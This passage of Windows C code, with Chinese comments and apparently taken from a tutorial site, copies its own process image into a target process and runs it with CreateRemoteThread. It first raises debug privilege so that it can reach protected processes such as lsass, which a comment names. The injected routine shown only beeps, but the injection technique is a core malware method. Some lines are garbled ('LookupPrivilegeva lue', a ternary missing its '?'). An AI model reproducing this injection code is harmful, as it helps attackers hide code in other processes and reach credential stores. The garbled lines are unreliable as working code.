|
ocessID
// printf("Process not found!\n");
return 9999;
}
//
//远程注入函数 www.2cto.com
void __stdcall RmoteThread()
{
HMODULE hMod,hMod2;
fnMessageBoxA myMessageBoxA;
fnBeep myBeep;
char* path[MAX_PATH];
hMod = GetModuleHandle("user32.dll");
hMod2 = GetModuleHandle("kernel32.dll");
myMessageBoxA = (fnMessageBoxA)GetProcAddress(hMod, (LPCSTR)"MessageBoxA");
myBeep = (fnBeep)GetProcAddress(hMod2, (LPCSTR)"Beep");
/*for(int i=0;i<30;i++)
{
myBeep(800,400);
}
*/
// while(1)
for(int i=0;i<6;i++)
{
Beep(600,100);
Sleep(200);
}
GetModuleFileName(NULL,(char*)path,MAX_PATH);
// myMessageBoxA(NULL, (char*)path, NULL, 64);
}
//
// 提升应用级调试权限
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeva lue(NULL,szPrivName,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}
//
///说明: 插入代码,远程线程为RmoteThread()
///参数: Pid = 进程PID
///返回: 成功True,否则False
bool InjectExe(DWORD Pid)
{
bool status = false;
LPVOID pBaseAddr = NULL;
HMODULE hMod = GetModuleHandle(NULL);
LONG hNHOffset = PIMAGE_DOS_HEADER(hMod)->e_lfanew;
HANDLE hThread,
hProcess,
hToken;
DWORD cbImage;
//cbImage=内存中整个PE映像体的尺寸
cbImage= PIMAGE_NT_HEADERS((DWORD)hMod + (DWORD)hNHOffset)->OptionalHeader.SizeOfImage;
//重要,否则不能注入lsass
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, Pid);
if (hProcess == NULL)
{
#ifdef debug
MessageBoxA(NULL, "错误OpenProcess", NULL, 64);
#endif
goto Err;
}
//释放远程内存
VirtualFreeEx(hProcess, LPVOID(hMod), 0, MEM_RELEASE);
//分配远程内存
pBaseAddr = VirtualAllocEx(hProcess, LPVOID(hMod), cbImage, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (pBaseAddr == NULL)
{
#ifdef debug
MessageBoxA(NULL, "VirtualAllocEx failed", NULL, 64);
#endif
goto Err;
}
//写进去,将本进程的整个PE体 全写进目标进程,够狠~
if (!WriteProcessMemory(hProcess, pBaseAddr, LPVOID(hMod), cbImage, NULL))
{
#ifdef debug
MessageBoxA(NULL, "WriteProcessMemory failed", NULL, 64);
#endif
goto Err;
}
hThread = CreateRemoteThread(hProcess, NULL, NULL, \
(LPTHREAD_START_ROUTINE)&RmoteThread, NULL, NULL, NULL);
if (hThread == NULL)
{
#ifdef debug
MessageBoxA(NULL, "CreateRemoteThread failed", NULL, 64);
#endif
goto Err;
}
// WaitForSingleObject(hThread, INFINITE);
|